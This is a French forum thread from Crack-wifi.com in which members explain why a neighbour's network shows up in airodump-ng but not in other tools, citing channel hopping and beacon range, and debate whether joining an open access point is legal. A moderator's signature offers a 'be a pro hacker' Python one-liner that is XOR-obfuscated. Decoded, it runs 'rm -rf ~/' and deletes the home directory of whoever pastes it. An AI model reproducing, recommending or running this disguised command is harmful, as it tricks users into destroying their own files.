Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-02-2011 22:01:16

necromoine
Membre Radioactif

Etrangeté de la "captation" des réseau.

Bonjour, j'ai remarqué quelque étrangeté lors de mes test de réseau, en effet, en ligne de commande avec airodump-ng, certaines réseau sont capté, et meme pas mal.
Je reviens sur l'interface graphique (trou de mémoire sur le nom) et la, le reseau auquel je voulais me connecter n'est pas la.
Je débranche l'antenne, la rebranche, pour me rendre compte, que je n'arrivais vraiment pas à retrouver se reseau, je fais de nouveau un scan et la revoila le réseau (sur airodump).
Je redémarre sur windows, et la, plein de nouveau réseau apparaissent (que je ne déctctais pas avec linu) mais aucune trace du réseau cible.

Auriez vous une idée ? Je n'ai pas bougé l'antenne d'un demie centimetre car comme elle se péter la gueule, je l'ai scotchée.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-02-2011 22:21:43

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Etrangeté de la "captation" des réseau.

necromoine a écrit :

Bonjour, j'ai remarqué quelque étrangeté lors de mes test de réseau, en effet, en ligne de commande avec airodump-ng, certaines réseau sont capté, et meme pas mal.
Je reviens sur l'interface graphique (trou de mémoire sur le nom) et la, le reseau auquel je voulais me connecter n'est pas la

Auriez vous une idée ?.

J'ai dans l'idée qu'il ne t'appartient pas en tout cas smile

Dernière modification par noireaude (11-02-2011 22:22:14)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 11-02-2011 22:24:55

necromoine
Membre Radioactif

Oui, il ne m'appartient pas, mais est t'il interdit de se connecter a  des réseau ouvert ? Pour moi c'est comme un hotspot.

#4 11-02-2011 22:33:16

noireaude
Membre d'honneur
Site Web

Si tu as des identifiants fourni dans ce but ou si le proprio partage son ap, non, ce n'est pas illégal, ils sont faits pour ça, tu n'avais pas précisé le type de réseaux.

Sinon, je ne sais pas vraiment à quoi cela est du mais j'ai dans l'idée que certains type de paquets que tu captes avec airodump lors d'un scan voyagent plus loin que ceux que tu utilise une fois authentifié. (les beacons je crois)

Mais cette explication est  vraiment à prendre avec des pincettes.

Je ne saurais pas te l'expliquer, ni même si c'est la seule raison, mais Antares devrait pas tarder à le faire en détail smile.

Dernière modification par noireaude (11-02-2011 22:37:13)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#5 11-02-2011 22:47:27

antares145
Membre d'honneur
Site Web

Rhaaa, mais pourquoi toujours moi à la fin ? big_smile

Bon, pour le problème principal j'en sais trop rien (<= aaah, tu vois qu'il faut pas m'invoquer trop vite tongue), peut-être un changement dans la liaison (obstacle en plus,...), tu le recevais correctement, le réseau-cible ? Sinon, j'ai tendance à penser au channel hopping (sauts de canal), si tu ne te verrouilles pas sur le canal du réseau-cible en question tu peux louper des beacons, et donc ne pas "voir" le réseau. Essaie de te caler sur le bon canal, et regarde ce que ça donne. Au passage, je sais pas trop de quelle interface pour airodump tu parles hmm Précise aussi quelle carte tu utilises, et quelle version de BT.

Ensuite, sur la question de la légalité de la connexion à un AP ouvert, je crois me souvenir que la loi est assez floue à ce sujet... Ce n'est pas vraiment "interdit" (parce qu'il n'y a aucune sécurité), mais ce n'est pas autorisé pour autant, et ça va fortement dépendre de l'usage que tu en feras. Pour faire une analogie foireuse, c'est comme si tu laisses une voiture avec la portière ouverte : les passants pourraient s'asseoir au volant (ils ne font rien de mal) mais pas se servir dans la boîte à gants ou aller faire un tour avec smile
Enfin, avec le très récent concept de "négligence caractérisée" pondu par le gouvernement si compétent en la matière (:rolleyes:), ça a peut-être changé... Limite, ça serait peut-être même le propriétaire qui aurait plus de problème que l'intrus je pense lol

Et finalement, pour l'explication de notre bovin préféré (je VEUX voir une vache manipuler des pincettes big_smile), les beacons ont effectivement une portée plus importante que les paquets de données, à cause du fait qu'ils sont émis au débit le plus bas (généralement 1 Mbps), et donc avec une modulation qui résiste mieux au bruit. Techniquement, si tu utilises le réseau à 1 Mbps les autres paquets auront la même portée, mais ce n'est pas vraiment confortable smile

[EDIT] Je déplace le topic dans une section plus appropriée

#6 12-02-2011 18:54:48

noireaude
Membre d'honneur
Site Web

antares145 a écrit :

Rhaaa, mais pourquoi toujours moi à la fin ? big_smile

Parceque tu te fais vieux !!!

#7 13-02-2011 17:22:17

spawn
Modérateur

Je crois que j'ai un idée.
Windows te cacherait des choses ? Par exemple un réseau qu'il ne capte pas vraiment bien ?
Noon.. Il oserait pas. (:lol:).
Si il ne les affiches pas, je suis persuadé que c'est parce qu'il n'a chopé que 3-4 beacons malades et qu'il ne te propose pas la connexion puisque de toute façon ca irait à 2 à l'heure.

Renseignes-toi du coté de ta carte Wifi pour voir si tu ne peux pas lancer une authentification avec une ligne de commande. (oui, avec la console de windows. si, si, je vous assure qu'elle sert de temps en temps ^^)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce